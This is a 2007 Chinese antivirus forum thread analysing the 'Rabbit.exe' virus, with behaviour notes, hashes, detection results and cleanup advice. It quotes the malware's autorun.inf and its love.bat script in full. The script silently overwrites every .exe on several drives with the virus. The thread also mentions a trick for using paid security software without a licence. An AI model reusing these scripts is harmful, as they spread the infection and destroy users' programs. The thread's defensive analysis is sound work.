瑞星卡卡安全论坛

首页 » 技术交流区 » 反病毒/反流氓软件论坛 » 警惕恶性病毒“兔宝宝”【4月8日原版、4月10日出现新变种】
baohe - 2007-4-9 1:52:00
【注】:2007-04-10,又见到这个“小兔仔子”的变种(文件大小为192K,此变种还夹带wsttrs病毒)。

2007-04-08,在本论坛浏览帖子发现有网友提到一个名为“兔宝宝”(Rabbit.exe,文件大小:260K)的病毒。
依我看,Rabbit.exe叫“小兔仔子”可能更贴切

下载该样本,在“影子系统”下观察了一下其感染系统的情形(卡巴斯基和瑞星最新病毒库均查不到此毒)。现将所见过程罗列如下,希望大家警惕。

1、病毒运行后释放的病毒文件见图1。此毒运行后关闭Tiny的Activity Monitor、SSM、IceSword等窗口。

2、msexch400.dll是此毒的一个重要角色(插入winlogon.exe进程且不能强制卸除)。

3、病毒在硬盘各分区根目录和U盘根目录下创建autorun.inf和Rabbit.exe。autorun.inf文件内容如下:
autorun.inf
[autorun]
Label=本地磁盘

Shellexecute=Rabbit.exe

love.bat的内容如下:

FOR  %%a in ( d: e: f: h: g: ) do dir /s/b %%a\*.exe>>c:\windows\msconfig.inf
cd C:\Program Files
dir *.exe /s /b >>c:\windows\msconfig1.inf
FOR  /f "delims=" %%i in (c:\windows\msconfig.inf) do copy /y "C:\WINDOWS\system32\Rabbit.exe" "%%i"
FOR  /f "delims=" %%i in (c:\windows\msconfig1.inf) do copy /y "C:\WINDOWS\system32\Rabbit.exe" "%%i"

4、注册表改动:
(1)在注册表HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\分支添加启动项:
{4bf41072-b2b1-21c1-b5c1-0305f4155515}
指向C:\WINDOWS\system32\JK.exe
(2)删除HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot

5、系统文件以外(包括非系统分区)的.exe文件均被替换为260K大小的病毒文件(文件名还是原来正常.exe的文件名),图标变为“兔宝宝”(图2)。即使是“卡巴斯基”或“瑞星”文件夹中的.exe也不例外。

6、Tiny用户,即使预先设置了相关文件保护规则,病毒依然可以突破Tiny的FD规则,将那些受Tiny保护的.exe文件替换成260K的病毒文件。这是我第一次遇到可以突破Tiny 文件保护的病毒。

7、还观察到此毒的另一个有趣行为:在系统分区以外的分区中,只要发现一个DLL文件(如:abc.dll),病毒即刻创建一个同名的、260K的.exe(abc.exe),图标也是“兔宝宝”。

8、中招后,用户就别指望扫什么劳什子日志求助了。运行任何.exe(当然包括SRENG等),你只能见到一闪而过的命令提示符窗口(实际运行的是那个260K的病毒体)。

9、此毒可能认为自己很NB,并未没采用多数病毒的常用策略————禁用taskmgr和regedit。

10、此毒不能突破“影子系统”。安装SSM和Tiny的用户,Rabbit.exe运行时,用户可看到相应提示对话框。如果用户足够警惕且予以正确回应,SSM和Tiny可阻止此毒运行。


图1

附件: 15584720074914300.jpg
baohe - 2007-4-9 1:53:00
图2

附件: 15584720074914325.jpg
鸟儿天上飞 - 2007-4-9 2:08:00
突破Tiny...呵呵 应该是大叔太看的起Tiny了  让这些颇有用心的"潜水健将"惦记上了..这个病毒只能预防了  中了.基本没有挽回的余地了吧..
水树雨下 - 2007-4-9 6:28:00
得,中了没救
spiritfire - 2007-4-9 8:03:00
城头变幻病毒图!
中后赶紧删exe吧!
高歌猛进 - 2007-4-9 8:28:00
最好还是禁止那个autorun.inf文件创建,不给其运行的机会
baohe - 2007-4-9 8:35:00
引用:
【高歌猛进的贴子】最好还是禁止那个autorun.inf文件创建,不给其运行的机会
………………

禁止autorun.inf创建——————没多大意义。
这个病毒连瑞星的.exe都替换掉了。瑞星启动加载————————运行的就是病毒体。
孤独更可靠 - 2007-4-9 8:44:00
FOR %%a in ( d: e: f: h: g: ) do dir /s/b %%a\*.exe>>c:\windows\msconfig.inf

....搜索除C盘(系统盘?如果用户把系统盘放在C盘以外的下,遭殃....)D-G所有可执行文件,把搜索到的文件保存在:\windows\msconfig.inf
...


cd C:\Program Files
dir *.exe /s /b >>c:\windows\msconfig1.inf
..看来他是怕覆盖到系统(EXE)文件..连Program Files目录下的也不放过?


FOR /f "delims=" %%i in (c:\windows\msconfig.inf) do copy /y "C:\WINDOWS\system32\Rabbit.exe" "%%i"

读取c:\windows\msconfig.inf的EXE文件,用C:\WINDOWS\system32\Rabbit.exe覆盖过去,MD,配合参数Y用...静止模式..(覆盖过程中不提示,除非有EXE文件设置只读,不然全部遭殃.)

FOR /f "delims=" %%i in (c:\windows\msconfig1.inf) do copy /y "C:\WINDOWS\system32\Rabbit.exe" "%%i"

覆盖C盘的Program Files里的EXE文件..还是静止模式


还有,猫叔,如果我没猜错的话,,Rabbit.exe应该是兔子图形吧?


(1)在注册表HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\分支添加启动项:
{4bf41072-b2b1-21c1-b5c1-0305f4155515}
指向C:\WINDOWS\system32\JK.exe

这个是重启时安装?JK是什么,病毒吗?

(2)删除HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot
这个是删除进入安全模式的吧...

麻烦,猫叔,发份到Lyhan_1988@163.com

谢谢哈!
xushunli - 2007-4-9 8:57:00
谢谢楼主!!!不过怎么预防啊!!!别的电脑中了只有从装系统可是吗??所有的EXE都被替换!!那不是很可怕!!!
baohe - 2007-4-9 9:02:00
【回复“孤独更可靠”的帖子】
已发
另壶冲 - 2007-4-9 9:03:00
baohe 辛苦了。。
杀软更新要及时啊。。
高歌猛进 - 2007-4-9 9:03:00
现在上网要特别小心,卡饭好象也中招了,看样子管理员权限没有了,各大论坛成了目标
baohe - 2007-4-9 9:04:00
引用:
【xushunli的贴子】谢谢楼主!!!不过怎么预防啊!!!别的电脑中了只有从装系统可是吗??所有的EXE都被替换!!那不是很可怕!!!
………………

如果你装了SSM,且注意并正确回应SSM的对话框信息,SSM可以阻止此毒运行。其它的HIPS,应该也行吧(没试过)。

中招的电脑,如果有光盘GHOST备份(GHOST.EXE也在光盘中),可以用该备份恢复系统。
如果只有硬盘GHOST备份,请检查一下该备份是否完整(我没看.GHO文件是否被删除)。如果硬盘中的.GHO文件完整,可以在DOS下用干净的GHOST.EXE替换被病毒替换的GHOST.EXE,再运行GHOST.EXE,用.GHO备份恢复系统。
非系统分区和染毒的移动存贮介质:先禁止一切自动播放。然后右键打开分区(或移动磁盘),删除根目录下的autorun.inf和rabbit.exe。然后删除U盘或移动硬盘中的图标为“兔宝宝”的文件(文件大小为260K);将自己的重要数据拷贝到移动存贮介质中。最后,格式化非系统分区。
艾玛 - 2007-4-9 9:07:00




http://hi.baidu.com/killvir/blog/item/b1219e51ea274e2543a75b5a.html



两个铁球 - 2007-4-9 9:21:00
谢谢提醒!带HIPS功能的安全软件一般都能防住(在注意提示,细看慢点的条件下)?
瑞星的现在带了这种功能吗?我的同事托我问问。
baohe - 2007-4-9 9:29:00
引用:
【两个铁球的贴子】谢谢提醒!带HIPS功能的安全软件一般都能防住(在注意提示,细看慢点的条件下)?
瑞星的现在带了这种功能吗?我的同事托我问问。
………………

1、我只观察过SSM的防护效能————SSM能阻止此毒(前提是:注意看提示框并予以正确回应)。
2、瑞星貌似没有HIPS功能吧。
鸟儿天上飞 - 2007-4-9 9:32:00
大叔呀..没看到我发的悄悄话吗??...555  快回答我的问题呀
孤独更可靠 - 2007-4-9 9:35:00
谢猫叔了

样本收到了

MD.

OD打不开.(马上就死了)

C32Asm打开后闪下又没拉..

算拉>_<

艾玛版主那个连接说的比较详细了

偶就试运行下,嘿嘿

现在在影子模式,

开工~~~


baohe - 2007-4-9 9:35:00
引用:
【鸟儿天上飞的贴子】大叔呀..没看到我发的悄悄话吗??...555  快回答我的问题呀
………………

我的“悄悄话”早就坏了(悄悄话统统进邮箱)。
在这里说吧。
艾玛 - 2007-4-9 9:35:00
在2008计划主动防御不清楚,但虚拟技术脱查引擎会提升
newcenturymoon - 2007-4-9 9:37:00
引用:
【孤独更可靠的贴子】FOR %%a in ( d: e: f: h: g: ) do dir /s/b %%a\*.exe>>c:\windows\msconfig.inf

....搜索除C盘(系统盘?如果用户把系统盘放在C盘以外的下,遭殃....)D-G所有可执行文件,把搜索到的文件保存在:\windows\msconfig.inf
...


cd C:\Program Files
dir *.exe /s /b >>c:\windows\msconfig1.inf
..看来他是怕覆盖到系统(EXE)文件..连Program Files目录下的也不放过?


FOR /f "delims=" %%i in (c:\windows\msconfig.inf) do copy /y "C:\WINDOWS\system32\Rabbit.exe" "%%i"

读取c:\windows\msconfig.inf的EXE文件,用C:\WINDOWS\system32\Rabbit.exe覆盖过去,MD,配合参数Y用...静止模式..(覆盖过程中不提示,除非有EXE文件设置只读,不然全部遭殃.)

FOR /f "delims=" %%i in (c:\windows\msconfig1.inf) do copy /y "C:\WINDOWS\system32\Rabbit.exe" "%%i"

覆盖C盘的Program Files里的EXE文件..还是静止模式


还有,猫叔,如果我没猜错的话,,Rabbit.exe应该是兔子图形吧?


(1)在注册表HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\分支添加启动项:
{4bf41072-b2b1-21c1-b5c1-0305f4155515}
指向C:\WINDOWS\system32\JK.exe

这个是重启时安装?JK是什么,病毒吗?

(2)删除HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot
这个是删除进入安全模式的吧...

麻烦,猫叔,发份到Lyhan_1988@163.com

谢谢哈!
………………

病毒会释放如下文件
C:\WINDOWS\system32\JK.exe
C:\WINDOWS\system32\love.bat
C:\WINDOWS\system32\loveRabbit.bat
C:\WINDOWS\system32\loveRabbit.exe
C:\WINDOWS\system32\msexch400.dll
C:\WINDOWS\system32\Rabbit.exe
C:\WINDOWS\msconfig.inf
C:\WINDOWS\msconfig1.inf
鸟儿天上飞 - 2007-4-9 9:38:00
问题..就是在虚拟机里测试病毒..比如熊猫一类的  我家是居于网  能不能通过虚拟机传播到别的电脑上  玛姐姐也给下意见吧  大叔从来不用虚拟机的 估计问他没什么答案了
newcenturymoon - 2007-4-9 9:38:00
我也写了哦 嘻嘻
昨天弄了俩小时呢...
http://forum.ikaka.com/topic.asp?board=28&artid=8295622
newcenturymoon - 2007-4-9 9:39:00
引用:
【baohe的贴子】
我的“悄悄话”早就坏了(悄悄话统统进邮箱)。
在这里说吧。
………………

我测试的时候不能关机 注销 或者重启 这是为什么?
baohe - 2007-4-9 9:43:00
引用:
【鸟儿天上飞的贴子】问题..就是在虚拟机里测试病毒..比如熊猫一类的  我家是居于网  能不能通过虚拟机传播到别的电脑上  玛姐姐也给下意见吧  大叔从来不用虚拟机的 估计问他没什么答案了
………………

俺不玩儿“虚拟机”。
鸟儿天上飞 - 2007-4-9 9:45:00
引用:
【baohe的贴子】
俺不玩儿“虚拟机”。
………………

我就知道....
baohe - 2007-4-9 9:45:00
引用:
【newcenturymoon的贴子】
我测试的时候不能关机 注销 或者重启 这是为什么?
………………

在“影子系统”中运行rabbit.exe,SSM和Tiny的提问——————一路绿灯放行,没遇到你说的这种现象。
两个铁球 - 2007-4-9 9:48:00
引用:
【baohe的贴子】
我的“悄悄话”早就坏了(悄悄话统统进邮箱)。
在这里说吧。
………………

难怪我发了那么多次求你帮助的悄悄话不见反应咧。我还以为啥时我无意中得罪了你或回帖发言中有所冒犯咧!

请给我一个能正常使用非免费版SSM的方法或KEY什么的!深深拜谢啦!
baohe - 2007-4-9 9:52:00
引用:
【两个铁球的贴子】
难怪我发了那么多次求你帮助的悄悄话不见反应咧。我还以为啥时我无意中得罪了你或回帖发言中有所冒犯咧!

请给我一个能正常使用非免费版SSM的方法或KEY什么的!深深拜谢啦!
………………

俺没什么劳什子KEY啊。
还是用封注册表相应CLSID读写权限的老办法。
孤独更可靠 - 2007-4-9 10:13:00
引用:
【newcenturymoon的贴子】
我测试的时候不能关机 注销 或者重启 这是为什么?
………………


我测试的时候也和你一样,汇编的也打不开,可能是病毒的问题


File size: 265276 bytes
MD5: a012baddced8431e3a57d5a5ab8e222d
SHA1: 81dd357b504100647fb6e9d72b83d3a15db26cdd
加壳方式:未
编写方式:未知
CAT-QuickHeal 9.00 04.06.2007 (Suspicious) - DNAScan
Fortinet 2.85.0.0 04.08.2007 suspicious
Sunbelt 2.2.907.0 04.07.2007 VIPRE.Suspicious
Webwasher-Gateway 6.0.1 04.08.2007 Win32.Malware.gen (suspicious)

.........................


哎..就写了个开头..

猫叔给的样本运行了没反映..>_<

我什么都关了,监控.SSM.文件监控和注册表监控也都关了

还是不行.


5555

1234
查看完整版本: 警惕恶性病毒“兔宝宝”【4月8日原版、4月10日出现新变种】